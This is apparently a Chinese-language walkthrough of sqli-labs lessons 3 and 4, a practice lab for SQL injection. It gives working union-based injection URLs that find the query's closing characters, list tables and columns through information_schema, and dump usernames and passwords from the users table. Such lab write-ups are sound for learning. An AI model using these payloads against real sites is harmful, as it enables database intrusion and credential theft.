Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)
还是先判断这是一个什么类型的注入
尝试输入:可以看到报错信息中出现了类似)的东西尝试带上),
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+
发现网页可以显示出来,就此判断这个网页的闭合符号为(’ ')
剩下的按照前两次的方法进行爆破
获得有效列数:
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,database() --+
获得数据库的表名
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
获得字段名:
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
获取相关信息:
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users --+
Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
判断注入类型:双引号报错
http://127.0.0.1/sqli-labs-master/Less-4/?id=1"
根据提示再输入括号
http://127.0.0.1/sqli-labs-master/Less-4/?id=1") --+
之后过程同上